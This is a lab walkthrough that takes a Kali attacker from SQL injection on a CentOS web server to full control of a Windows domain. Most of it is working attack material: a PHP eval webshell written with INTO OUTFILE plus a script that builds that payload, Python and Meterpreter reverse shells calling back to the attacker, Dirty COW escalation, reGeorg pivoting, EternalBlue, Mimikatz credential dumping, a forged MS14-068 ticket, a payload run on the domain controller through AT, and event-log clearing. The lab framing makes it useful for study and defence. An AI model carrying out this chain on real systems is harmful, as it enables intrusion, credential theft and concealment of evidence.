Lab topology

  1. Kali Linux (attacker machine)
  2. CentOS 6.4 (web server, two network interfaces)
  3. Win7 (domain member host, no Internet access)
  4. Win2008R2 (domain controller, no Internet access)

Purpose

Starting from Kali Linux, obtain control of the domain (the domain controller) by way of the web server and the Win7 member host.


Web penetration

Directory scanning

Scan the web root with DirBuster, using Kali's default wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt.

The scan finds phpinfo.php

phpinfo.php leaks the absolute path of the site on disk (DOCUMENT_ROOT), which is what makes writing a file into the web root possible later.

A SQL query error is also observed on one page

Testing confirms an integer-type SQL injection (no quotes needed in the payload), which is then used to obtain a webshell.

SQL injection

Confirm the SQL injection with sqlmap (the * marks the injection point in the id parameter)

sqlmap -u "http://IP:8888/newsshow.php?cid=4&id=19*" --dbms mysql -v 3

Get a webshell

Since the absolute path is known, a webshell can be written to disk directly. Either sqlmap's --os-shell or a hand-written UNION ... INTO OUTFILE query works; both need the MySQL user to have the FILE privilege, secure_file_priv not to restrict the target directory, and the web root to be writable by the mysql system user.

sqlmap (--os-shell)

sqlmap -u "http://IP/newsshow.php?cid=4&id=19*" --dbms mysql -v 3 --os-shell

Write the webshell directly (the POST parameter used as the password is pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

The original query returns 26 columns, column 9 is the one that ends up in the file, and the hex literal is MySQL's way of writing a string without quote characters: 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e decodes to <?php eval($_POST['pass'])?>.
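An added example (not from the original writeup) of how the payload above is assembled, so the column count, the echoed column and the hex encoding can be changed without hand-editing the URL. It reproduces the page's exact payload for 26 columns with column 9 echoed; the URL builder, function names and the helper that decodes a captured hex literal back to PHP are this example's own.

```python
"""Build the UNION SELECT ... INTO OUTFILE payload used for the webshell.

Hex-encoding the PHP source keeps every quote character out of the injected
SQL, so the payload survives addslashes()/magic_quotes and needs no escaping
in the URL. The placeholder integers keep the column count equal to the
original SELECT, which UNION requires.
"""
import binascii
from urllib.parse import quote_plus

# The one-liner written by the page; the POST parameter "pass" is the password.
PHP_BACKDOOR = "<?php eval($_POST['pass'])?>"


def php_hex_literal(php_source: str) -> str:
    """Encode PHP source as a MySQL hex literal (0x...), which MySQL treats as a binary string."""
    return "0x" + binascii.hexlify(php_source.encode()).decode()


def decode_hex_literal(literal: str) -> str:
    """Inverse of php_hex_literal: check what a payload seen in a log would actually write."""
    if not literal.startswith("0x"):
        raise ValueError("not a MySQL hex literal")
    return binascii.unhexlify(literal[2:]).decode()


def build_outfile_payload(column_count: int, echo_column: int, php_source: str, outfile: str) -> str:
    """Return the SQL tail appended to the injectable integer parameter.

    column_count: columns the original SELECT returns (found with ORDER BY / UNION probing)
    echo_column:  1-based column whose value ends up in the output file
    outfile:      absolute path under the web root (needs FILE privilege; secure_file_priv must allow it)
    """
    if not 1 <= echo_column <= column_count:
        raise ValueError("echo_column must be between 1 and column_count")
    columns = [str(i) for i in range(1, column_count + 1)]
    columns[echo_column - 1] = php_hex_literal(php_source)
    return "and 1=2 UNION SELECT " + ",".join(columns) + f" into outfile '{outfile}'"


def build_injection_url(base_url: str, cid: int, vulnerable_id: int, payload: str) -> str:
    """Assemble the GET request; id is an integer parameter, so the payload follows it unquoted."""
    return f"{base_url}?cid={cid}&id={vulnerable_id}+{quote_plus(payload, safe='/=,()' + chr(39))}"


if __name__ == "__main__":
    payload = build_outfile_payload(26, 9, PHP_BACKDOOR, "/var/www/html/webshell.php")
    print(build_injection_url("http://IP/newsshow.php", 4, 19, payload))
```

If the hex literal in a captured request does not decode to valid PHP, the webshell was still written to disk (MySQL does not care), which is worth remembering when cleaning up afterwards.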

Reverse shell

To make the following steps easier, spawn a reverse shell from the target.

Obtain target system information

os-shell> uname -a
os-shell> whereis python

Get a Meterpreter session

Python is installed by default on most Linux distributions, so a Python reverse payload can be generated directly.

# generate the Python reverse payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw

# start the MSF listener
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST IP
set LPORT 4444
run

The handler can also be put in a resource file, py_reverse_tcp.rc:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.17
set LPORT 4444
exploit

msfconsole -r py_reverse_tcp.rc

Execute the Python Meterpreter payload from the sqlmap os-shell

os-shell> python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRyeToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUuc2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKVswXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxlbihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"

Generate this one-liner with the msfvenom command above for your own LHOST and LPORT rather than copying it: the base64 part embeds the listener address and port.

nc + Python reverse shell

# Kali listens for the connection
root@kali:~# nc -lvvp 6666

# run in the sqlmap os-shell on the target
os-shell> python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.close()"

sqlmap output:

Shell received on the listening port:

Privilege escalation

Once a shell is obtained, try to escalate privileges.

Check the kernel version

Run uname -a to get the running kernel version.

Escalate using a known vulnerability

Download the privilege escalation exploit matching the kernel (here Dirty COW, CVE-2016-5195, is used):

cd /tmp/
wget --no-check-certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty 123456

This yields the user firefart with UID 0: the exploit overwrites the root entry in /etc/passwd with a new user named firefart and the chosen password, after backing the file up to /tmp/passwd.bak.

su firefart

After switching to firefart, restore the original /etc/passwd from that backup, otherwise the real root account stays unusable and the modified file is an obvious artefact.

mv /tmp/passwd.bak /etc/passwd

Lateral movement

Checking the network adapters reveals a second interface and with it the internal network address range.

Network pivoting

Meterpreter autoroute (preferred)

meterpreter > run autoroute -s 10.0.0.1/24
meterpreter > run autoroute -p

-s adds a route for the subnet through this session; -p prints the current routing table.

reGeorg + proxychains

The web server's second interface has no route to the Internet, and Kali has none to the internal segment, so traffic into the internal network has to be proxied through the web server.

Place tunnel.nosocket.php in the web root of the web server so that it relays the traffic:

# 1. download it on the web server
wget --no-check-certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.nosocket.php
mv tunnel.nosocket.php /var/www/html/

# 2. or upload it from Kali through the Meterpreter session
meterpreter > upload /root/reGeorg/tunnel.nosocket.php /var/www/html

Check that tunnel.nosocket.php is reachable over HTTP

Run the reGeorg proxy script on Kali

python reGeorgSocksProxy.py -p 9999 -u http://IP:8888/tunnel.nosocket.php

Edit the proxychains configuration file and add the SOCKS entry as the last line.

vim /etc/proxychains.conf
socks5 127.0.0.1 9999

## MSF built-in proxy setting

setg Proxies socks5:127.0.0.1:9999
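An added example, not part of the original writeup, of what proxychains and the MSF Proxies setting do for every connection: a hand-written SOCKS5 CONNECT (RFC 1928, no authentication), run against a toy in-process SOCKS5 proxy and an echo target so it works offline. The proxy, target and message are constructed for the demo; the closed-port probe at the end is how a connect scan through the proxy distinguishes open from closed, which is the mechanism behind the port scan in the next section.

```python
"""Hand-rolled SOCKS5 CONNECT (RFC 1928) plus a toy in-process SOCKS5 proxy
and echo target, so the exchange proxychains performs for every connect()
can be run and inspected offline. All addresses and data are constructed."""
import socket
import struct
import threading


def _recv_exact(sock, n):
    """SOCKS fields are fixed-width: read exactly n bytes or fail."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise OSError("connection closed during SOCKS exchange")
        buf += chunk
    return buf


def socks5_connect(proxy_host, proxy_port, dst_host, dst_port, timeout=5.0):
    """Return a TCP socket to dst_host:dst_port tunnelled through a no-auth SOCKS5 proxy."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        s.sendall(b"\x05\x01\x00")                   # VER=5, NMETHODS=1, METHOD=0 (no auth)
        ver, method = _recv_exact(s, 2)
        if ver != 5 or method != 0:
            raise OSError("proxy rejected the no-auth method")
        name = dst_host.encode()                     # ATYP=3: the proxy resolves the name itself
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", dst_port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if ver != 5 or rep != 0:
            raise OSError("SOCKS CONNECT failed, REP=0x%02x" % rep)
        addr_len = _recv_exact(s, 1)[0] if atyp == 3 else {1: 4, 4: 16}.get(atyp)
        if addr_len is None:
            raise OSError("unknown ATYP in SOCKS reply")
        _recv_exact(s, addr_len + 2)                 # skip BND.ADDR + BND.PORT
        return s
    except OSError:
        s.close()
        raise


def port_open_via_proxy(proxy, host, port):
    """One probe of a proxied connect scan: REP=0 means open, anything else closed/filtered."""
    try:
        socks5_connect(proxy[0], proxy[1], host, port).close()
        return True
    except OSError:
        return False


def _pipe(src, dst):
    """Relay one direction until EOF, then propagate the EOF with a half-close."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def toy_socks5_proxy(listen_sock, connections):
    """Minimal no-auth SOCKS5 server (CONNECT with domain-name ATYP only) for the demo."""
    for _ in range(connections):
        client, _ = listen_sock.accept()
        _ver, nmethods = _recv_exact(client, 2)
        _recv_exact(client, nmethods)
        client.sendall(b"\x05\x00")
        _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
        if cmd != 1 or atyp != 3:
            client.sendall(b"\x05\x07\x00\x01" + b"\x00" * 6)    # command not supported
            client.close()
            continue
        host = _recv_exact(client, _recv_exact(client, 1)[0]).decode()
        port = struct.unpack("!H", _recv_exact(client, 2))[0]
        try:
            upstream = socket.create_connection((host, port), timeout=3)
        except OSError:
            client.sendall(b"\x05\x05\x00\x01" + b"\x00" * 6)    # REP=5 connection refused
            client.close()
            continue
        client.sendall(b"\x05\x00\x00\x01" + b"\x00" * 6)        # REP=0 succeeded, BND zeroed
        threads = [threading.Thread(target=_pipe, args=(client, upstream)),
                   threading.Thread(target=_pipe, args=(upstream, client))]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        client.close()
        upstream.close()
    listen_sock.close()


def _echo_once(listen_sock):
    conn, _ = listen_sock.accept()
    with conn:
        while data := conn.recv(4096):
            conn.sendall(data)
    listen_sock.close()


def _listener():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(2)
    return s


def demo():
    """Send a message through the toy proxy to the echo target, then probe a closed port."""
    target, proxy, spare = _listener(), _listener(), _listener()
    closed_port = spare.getsockname()[1]
    spare.close()                                    # nothing listens on this port any more
    threading.Thread(target=_echo_once, args=(target,), daemon=True).start()
    threading.Thread(target=toy_socks5_proxy, args=(proxy, 2), daemon=True).start()
    proxy_addr = proxy.getsockname()
    s = socks5_connect(proxy_addr[0], proxy_addr[1], "127.0.0.1", target.getsockname()[1])
    s.sendall(b"ping from behind the proxy")
    s.shutdown(socket.SHUT_WR)
    reply = b"".join(iter(lambda: s.recv(4096), b""))
    s.close()
    return reply, port_open_via_proxy(proxy_addr, "127.0.0.1", closed_port)
```

Two things this makes visible: with ATYP=3 the name is resolved by the proxy (reGeorg, running inside the web server), so internal hostnames like dc1.kevin.com resolve even though Kali cannot; and every probe is a full TCP handshake on the far side, so a scan through the proxy is slow and noisy, which is why the page limits the port list and THREADS.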

Scanning internal assets

Port scanning

The MSF port scan module finds that 10.0.1.9 and 10.0.1.254 both have ports 445 and 3389 open.

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.1.1/24
set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,27017,50070
set THREADS 10
exploit

Open ports on 10.0.1.9

Open ports on 10.0.1.254

MS17-010 vulnerable host scan

Through the proxy, use the MSF scanner module to find hosts in the segment vulnerable to MS17-010

root@kali:~# proxychains msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.1.0-254
set THREADS 10
exploit

MS17-010 exploitation

Through the Meterpreter route, attack with the MS17-010 exploit module. A bind_tcp payload is used because the target has no route back to Kali; the session is established over the pivot instead.

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 10.0.1.9
run

Domain penetration

Information gathering

View information about the current host (the Domain field shows the current domain)

meterpreter > sysinfo

Use Mimikatz to obtain passwords

Load the Mimikatz extension and dump the plaintext credentials cached in memory

meterpreter > load mimikatz
meterpreter > wdigest

On Windows 7 / 2008 R2 WDigest caches the plaintext password by default, which is why this works; on Windows 8.1 / 2012 R2 and later, or on Windows 7 once KB2871997 is installed and UseLogonCredential is set to 0, only hashes are available. Recent Metasploit versions replace the mimikatz extension with kiwi (load kiwi, creds_wdigest).

Obtain the domain account SID

meterpreter > run post/windows/gather/enum_logged_on_users

Locate the domain controller

net group "domain controllers" /domain
ping dc1.kevin.com

MS14-068

MS14-068 needs a domain controller without KB3011780, plus a valid domain user's password and SID (collected above). The ticket request goes straight to the DC (-d 10.0.1.254), so it has to run through the pivot.

Generate a ticket with the Python script (pykek)

python ms14-068.py -u [email protected] -s S-1-5-21-4289546598-4075965387-827630551-1111 -d 10.0.1.254 -p Kevin@123

Generate the ticket with the MSF module

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
set DOMAIN KEVIN.com
set USER liujiafeng
set PASSWORD kevin@123
set USER_SID S-1-5-21-4289546598-4075965387-827630551-1111
set RHOST 10.0.1.254
run

Generate the kirbi file locally

Copy the ms14-068 ticket (.bin) from loot, /root/.msf4/loot/20191223050146_default_10.0.1.254_windows.kerberos_122860.bin, and export it

Convert kirbi to ccache

# convert the kirbi file to ccache
python ticket_converter.py 0-00000000-liujiafeng@krbtgt-KEVIN.COM.kirbi [email protected]
mv [email protected] /root/pykek/
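Why the forged ticket from ms14-068.py or the ms14_068_kerberos_checksum module is accepted, as an added example that is not part of the original writeup: a toy model of the KDC's PAC server-signature check. The PAC body, the key, the user and the RIDs are constructed for the demo, and the keyed checksum is simplified to a plain HMAC-SHA1 truncated to 96 bits (the real one, per MS-PAC 2.8, derives a usage-specific key first). The vulnerable and fixed validators differ only in whether an unkeyed SignatureType such as RSA-MD5, which the public exploit uses, is accepted.

```python
"""Why MS14-068 works: a KDC that accepts an unkeyed PAC checksum.

Toy model of the PAC server-signature check. The real PAC is an NDR structure
and the keyed checksum uses a usage-derived key; both are simplified here so
that only the validation decision that was wrong remains.
"""
import hashlib
import hmac
import struct

# SignatureType values from MS-PAC 2.8 (PAC_SIGNATURE_DATA)
KERB_CHECKSUM_RSA_MD5 = 0x07       # unkeyed; an unpatched KDC accepted it
HMAC_SHA1_96_AES256 = 0x10         # keyed with the krbtgt/service key
KEYED_TYPES = {HMAC_SHA1_96_AES256}

DOMAIN_USERS_RID = 513
DOMAIN_ADMINS_RID = 512
ENTERPRISE_ADMINS_RID = 519


def encode_pac(user: str, group_rids) -> bytes:
    """Constructed toy PAC body: username + group RIDs (stand-in for PAC_LOGON_INFO)."""
    name = user.encode()
    out = struct.pack("<H", len(name)) + name + struct.pack("<H", len(group_rids))
    return out + b"".join(struct.pack("<I", rid) for rid in group_rids)


def decode_pac(body: bytes):
    (n,) = struct.unpack_from("<H", body, 0)
    user = body[2:2 + n].decode()
    (count,) = struct.unpack_from("<H", body, 2 + n)
    return user, list(struct.unpack_from("<%dI" % count, body, 4 + n))


def pac_checksum(sig_type: int, body: bytes, key: bytes = None) -> bytes:
    if sig_type == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(body).digest()              # no key: anyone can compute it
    if sig_type == HMAC_SHA1_96_AES256:
        if key is None:
            raise ValueError("keyed checksum requires the service key")
        return hmac.new(key, body, hashlib.sha1).digest()[:12]   # simplified Kc derivation
    raise ValueError("unsupported checksum type 0x%02x" % sig_type)


def sign_pac(body: bytes, sig_type: int, key: bytes = None):
    return sig_type, pac_checksum(sig_type, body, key)


def validate_pac_vulnerable(body, signature, service_key) -> bool:
    """Pre-patch behaviour: honour whatever SignatureType the ticket itself declares."""
    sig_type, chk = signature
    try:
        return hmac.compare_digest(chk, pac_checksum(sig_type, body, service_key))
    except ValueError:
        return False


def validate_pac_fixed(body, signature, service_key) -> bool:
    """Post-patch behaviour: the checksum type must be keyed, otherwise reject outright."""
    sig_type, chk = signature
    if sig_type not in KEYED_TYPES:
        return False
    return hmac.compare_digest(chk, pac_checksum(sig_type, body, service_key))


def forge_domain_admin_pac(user: str):
    """What ms14-068.py does: rewrite the group list and sign with an unkeyed checksum."""
    body = encode_pac(user, [DOMAIN_USERS_RID, DOMAIN_ADMINS_RID, ENTERPRISE_ADMINS_RID])
    return body, sign_pac(body, KERB_CHECKSUM_RSA_MD5)


def is_domain_admin(body: bytes) -> bool:
    return DOMAIN_ADMINS_RID in decode_pac(body)[1]


if __name__ == "__main__":
    krbtgt_key = bytes(range(32))                       # constructed stand-in for the krbtgt key
    forged, sig = forge_domain_admin_pac("liujiafeng")
    print("unpatched KDC accepts forged PAC:", validate_pac_vulnerable(forged, sig, krbtgt_key))
    print("patched KDC accepts forged PAC:  ", validate_pac_fixed(forged, sig, krbtgt_key))
```

The attacker never needs the krbtgt key: the unpatched check lets the ticket choose the algorithm, and an unkeyed digest over attacker-controlled data is always "valid". The fix is the usual one for signature verification, decide the accepted algorithm on the verifier's side and ignore what the message claims.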

Generate a bind-connection MSF payload, test.exe

Generate the MSF bind payload (the domain controller cannot connect out, so the payload listens and the handler connects in over the pivot)

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 -f exe -o /root/pykek/test.exe

Create an MSF handler that connects to the bind payload

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.0.1.254
set LPORT 4444
run

Upload the tools

Upload the tools and the MS14-068 forged ticket to the Win7 pivot host

meterpreter > upload /root/pykek/[email protected] C:/users/kevin
meterpreter > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:/Users/kevin
meterpreter > upload /root/pykek/test.exe C:/Users/kevin
meterpreter > shell

Import the ticket

Run on the Win7 pivot host

klist purge
cd c:/users/kevin
mimikatz.exe
kerberos::ptc [email protected]

klist purge discards the existing tickets first, so that the forged TGT is the one presented when the domain controller's admin share is accessed.

Copy the payload to the domain controller

From the Win7 pivot, copy test.exe to the C: drive of the domain controller over the admin share (the forged ticket grants this access), then use the AT command to create a scheduled task that runs it

copy test.exe \\dc1.kevin.com\c$
dir \\dc1.kevin.com\c$

Add an AT scheduled task on the domain controller to run the payload (net time shows the DC's clock, which the task time must be based on)

net time \\dc1.kevin.com
at \\dc1.kevin.com 15:42:00 c:\test.exe

View the AT scheduled tasks on the domain controller

at \\dc1.kevin.com

Once the scheduled task has run, the bind payload listens on port 4444 of the domain controller and the handler connects to it

netstat -ano | findstr "4444"

All Meterpreter sessions obtained

Clean up traces

Terminate the MSF payload and delete the executable on the domain controller

at \\dc1.kevin.com 16:23:00 cmd /c del c:\test.exe

Delete the tools from Windows 7

cd c:/users/kevin
rm [email protected]
rm mimikatz.exe

Clear the Windows event logs

meterpreter > clearev

clearev wipes the Application, System and Security logs; clearing the Security log itself records event 1102 ("The audit log was cleared"), a standard detection trigger, so this step is loud rather than silent.